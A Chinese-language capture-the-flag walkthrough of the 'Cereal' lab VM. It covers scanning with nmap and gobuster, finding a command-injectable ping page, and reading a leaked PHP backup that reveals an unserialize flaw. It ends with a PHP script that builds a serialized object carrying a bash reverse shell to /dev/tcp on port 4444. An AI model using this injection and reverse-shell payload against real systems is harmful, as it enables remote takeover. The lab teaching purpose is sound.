Cereal 靶机

news2024/11/24 8:54:46

环境准备

靶机链接：百度网盘请输入提取码

提取码：bcj2

虚拟机网络链接模式：桥接模式

攻击机系统：kali linux 2021.1

信息收集

1.探测目标靶机 arp-scan -l

2.nmap -p- -A -T4 192.168.1.107

探测目标靶机开放端口和服务

漏洞探测

1.登录ftp查看可利用信息

tp 192.168.1.107

没有找到可以利用的信息

2.用gobuster对目录进行扫描

gobuster dir -u http://192.168.1.107 -w /usr/share/wordlists/dirb/big.txt -t 50

3.访问扫到的目录

4.http://192.168.1.107/admin/index.php 尝试sql注入的可能

5.http://192.168.1.107/blog/ 网页加载不完整，查看源码

6.curl -i -L http://192.168.1.107/blog 查看源码，发现域名信息

7. echo '192.168.1.107 cereal.ctf' >> /etc/hosts

source /etc/hosts

再次访问页面正常状态

8.gobuster vhost -u http://cereal.ctf -w /usr/share/wordlists/dirb/big.txt

没有检测到任何子域信息

9.访问44441端口

10.用gobuster对44441端口，其子域进行扫描

11.成功探测到子域信息，将子域添加到/etc/hosts

echo '192.168.1.107 secure.cereal.ctf' >> /etc/hosts

12.访问网页是一个执行ping命令的网页，那就可能存在命令执行漏洞

13.输入192.168.1.106-c 3;whoami

#-c 3 ping命令只执行三次输入命令，没有回显。用curl命令看网页源码

14.发现serialize（）函数这是序列化

15. 扫描子域的目录

gobuster dir -u http://secure.cereal.ctf:44441 -w /usr/share/wordlists/dirb/big.txt -t 50

漏洞利用

1.更换字典，成功扫出back_en目录

gobuster dir -u http://secure.cereal.ctf:44441 \ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -t 100 -e

//一定要用-t 参数设置线程要不然很慢，我这里用和没有差距在三分钟

2.查看网页 curl -i -L http://secure.cereal.ctf:44441/back_en/

3.成功扫出新目录

4.用curl命令查看新目录的源码，发现为ping命令的代码

pingTest这个类具有三个属性 ipAddress 来自请求正文， isValid 确定输入是否有效以及随后发送的输出。默认情况下，isValid 的值为 False，因此从浏览器发送请求时，它一定都会进入 if 模块。该模块检查该值是否为 IP 地址。因此，当我们尝试注入命令时，它拒绝了输入，所以，如果我们在请求中发送值 True，则根本不会执行 if 块。然后，它会直接调用 ping 方法。

curl -i -L http://secure.cereal.ctf:44441/back_en/index.php.bak

5.所以这里可以利用bp抓包，将public $isvalid = True;直接自己构造一个函数，进行反弹 shell的命令。

<?php

class pingTest {
	public $ipAddress = "192.168.1.106;bash -c 'bash -i >& /dev/tcp/192.168.1.106/4444 0>&1'";
	public $isValid =True;
}


echo urlencode(serialize(new pingTest))
?>